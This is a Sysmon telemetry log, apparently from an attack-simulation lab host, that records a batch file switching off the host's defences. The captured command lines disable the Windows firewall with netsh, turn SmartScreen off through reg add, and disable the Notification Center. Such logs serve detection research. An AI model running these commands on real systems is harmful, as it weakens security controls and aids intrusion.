10341000x80000000000000009124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.927{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.913{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\System32\netsh.exe10.0.14393.0 (rs1_release.160715-1616)Network Command ShellMicrosoft® Windows® Operating SystemMicrosoft Corporationnetsh.exenetsh firewall set opmode disableC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=4D51BCD0B94D09F5DFB80DF754D31E28,SHA256=E5888E649C881E4BBBCE472F6808F93B2B5564D3094995A5A08E66B2406C1607,IMPHASH=51DC8B92EF1620527201E5276E21BCA7{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.896{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Policies\Microsoft\Windows\Explorer\DisableNotificationCenterDWORD (0x00000001) 10341000x80000000000000009258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.902{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.881{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost\SmartScreenEnabledOff 10341000x80000000000000009249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.889{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 23542300x80000000000000009241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.834{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517E7974341D60588A27DD3E99C8ECEF,SHA256=5338442443F6DB22FB72101E5E89E514B73A1DDF8759D3718E5838DA859FBB73,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.818{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabledOff 10341000x80000000000000009239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 